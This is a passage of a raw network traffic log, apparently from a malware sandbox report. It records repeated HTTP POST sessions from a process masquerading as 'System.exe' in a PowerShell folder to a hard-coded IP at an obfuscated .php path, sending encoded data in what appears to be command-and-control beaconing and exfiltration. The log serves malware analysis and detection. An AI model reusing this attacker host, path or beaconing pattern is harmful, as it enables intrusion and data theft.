                                                                                                    Jan 4, 2025 14:53:09.472285032 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:09.816868067 CET2600OUTData Raw: 59 5a 58 58 5e 58 5d 57 5b 59 5a 55 50 5f 5b 53 56 52 54 41 52 5f 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZXX^X]W[YZUP_[SVRTAR_R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>:%:)4Y<-',X.#:T!#8.*>(&3./"Y ']/
                                                                                                    Jan 4, 2025 14:53:10.011003971 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:10.141278982 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    66192.168.2.449867154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:10.275753021 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:10.629373074 CET2600OUTData Raw: 5c 5e 5d 58 5b 5d 58 50 5b 59 5a 55 50 50 5b 56 56 55 54 43 52 5b 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^]X[]XP[YZUPP[VVUTCR[RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\98>&^.?.;(-%8,,#U"=6Q*-;$#(]9"Y ']/
                                                                                                    Jan 4, 2025 14:53:10.821053982 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:10.955748081 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    67192.168.2.449872154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:11.362147093 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:11.707536936 CET2600OUTData Raw: 5c 59 58 5a 5e 59 58 53 5b 59 5a 55 50 50 5b 51 56 50 54 49 52 58 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YXZ^YXS[YZUPP[QVPTIRXR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,62!>-X(./38/8&T"-;P6(>@%[/?"Y ']/
                                                                                                    Jan 4, 2025 14:53:11.879987001 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:12.010204077 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    68192.168.2.449877154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:12.132985115 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:12.488812923 CET2600OUTData Raw: 5c 5e 58 5e 5e 5c 58 5c 5b 59 5a 55 50 5b 5b 55 56 53 54 41 52 59 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^X^^\X\[YZUP[[UVSTARYRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/>)&;:W)(Y++R080Y.#)"-5Q)71<X."Y ']/(
                                                                                                    Jan 4, 2025 14:53:12.659781933 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:12.795891047 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    69192.168.2.449884154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:12.933610916 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:13.285761118 CET2600OUTData Raw: 5c 5d 58 5b 5b 58 5d 51 5b 59 5a 55 50 5a 5b 5b 56 56 54 49 52 58 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]X[[X]Q[YZUPZ[[VVTIRXRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;.&8"V>=7+;U'+X/3=5.'"8P)=#13(X:/"Y ']/,
                                                                                                    Jan 4, 2025 14:53:13.450690031 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:13.582140923 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    70192.168.2.449889154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:13.816440105 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:14.160758972 CET2596OUTData Raw: 5c 59 58 5f 5b 55 58 51 5b 59 5a 55 50 58 5b 52 56 57 54 43 52 58 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX_[UXQ[YZUPX[RVWTCRXR_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,X&&(>Q=_(=03]/.3.W!8">(.81:?"Y ']/
                                                                                                    Jan 4, 2025 14:53:14.311376095 CET25INHTTP/1.1 100 Continue


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    71192.168.2.449895154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:14.322803974 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:14.676282883 CET1876OUTData Raw: 59 5e 58 5b 5b 5a 5d 50 5b 59 5a 55 50 59 5b 5b 56 5c 54 47 52 5e 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^X[[Z]P[YZUPY[[V\TGR^RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,X)1(T>_++38?, 9"#Q!8(=;23([/?"Y ']/
                                                                                                    Jan 4, 2025 14:53:14.840615988 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:14.970238924 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 21 03 32 29 26 56 31 03 3f 09 2d 2f 22 0b 2b 0e 36 42 2f 3d 23 00 28 5c 37 19 2f 23 30 06 3e 01 26 08 2a 1f 05 50 27 3f 30 1e 28 0c 20 51 03 12 24 01 26 29 22 5a 2b 20 2e 04 3a 10 3c 08 35 32 3f 5a 31 04 00 5b 36 13 22 06 32 01 35 55 29 3f 25 50 2e 3d 33 10 2d 33 02 1e 3e 2f 23 55 0b 1f 25 1f 24 0f 12 52 31 06 19 04 3c 0e 3b 02 29 2a 30 0c 21 29 2f 03 24 3e 32 10 27 08 26 0d 27 1f 22 00 24 1d 0b 17 36 3d 3c 00 31 10 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98!2)&V1?-/"+6B/=#(\7/#0>&*P'?0( Q$&)"Z+ .:<52?Z1[6"25U)?%P.=3-3>/#U%$R1<;)*0!)/$>2'&'"$6=<1.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    72192.168.2.449896154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:14.445543051 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:14.801281929 CET2600OUTData Raw: 59 5c 5d 58 5b 5a 58 5d 5b 59 5a 55 50 5a 5b 51 56 52 54 42 52 5d 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\]X[ZX][YZUPZ[QVRTBR]R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,$+-=>;<-$#/U.T =$"8)Q(>27-"Y ']/,
                                                                                                    Jan 4, 2025 14:53:14.962734938 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:15.090140104 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    73192.168.2.449902154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:15.232325077 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2580
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:15.582513094 CET2580OUTData Raw: 5c 5c 5d 5b 5b 58 5d 56 5b 59 5a 55 50 58 5b 53 56 54 54 40 52 5a 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\][[X]V[YZUPX[SVTT@RZRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X,%_%+2>-0Y+$0$83>Q -P5;6=-827-"Y ']/(
                                                                                                    Jan 4, 2025 14:53:15.749661922 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:15.878210068 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    74192.168.2.449908154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:16.005599022 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:16.364669085 CET2600OUTData Raw: 59 50 58 58 5b 5b 58 5c 5b 59 5a 55 50 5e 5b 5a 56 5c 54 47 52 50 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPXX[[X\[YZUP^[ZV\TGRPRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z;-5X&^%=)>4'+(,U!6(5^!P=4D1 (9"Y ']/<
                                                                                                    Jan 4, 2025 14:53:16.531778097 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:16.667980909 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    75192.168.2.449909154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:16.832006931 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:17.176398039 CET2596OUTData Raw: 5c 5c 58 59 5e 59 5d 56 5b 59 5a 55 50 58 5b 52 56 50 54 44 52 5e 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\XY^Y]V[YZUPX[RVPTDR^RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^8=:&+&T*>?(3T'$/!><!(W=+%#,-/"Y ']/
                                                                                                    Jan 4, 2025 14:53:17.349109888 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:17.482182026 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    76192.168.2.449917154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:17.616327047 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:17.973148108 CET2600OUTData Raw: 59 5e 58 5d 5e 58 58 52 5b 59 5a 55 50 50 5b 50 56 54 54 42 52 51 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^X]^XXR[YZUPP[PVTTBRQR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y/."&^===3<;W'3,#."6+*=>81#//"Y ']/
                                                                                                    Jan 4, 2025 14:53:18.135929108 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:18.266771078 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    77192.168.2.449923154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:18.401825905 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
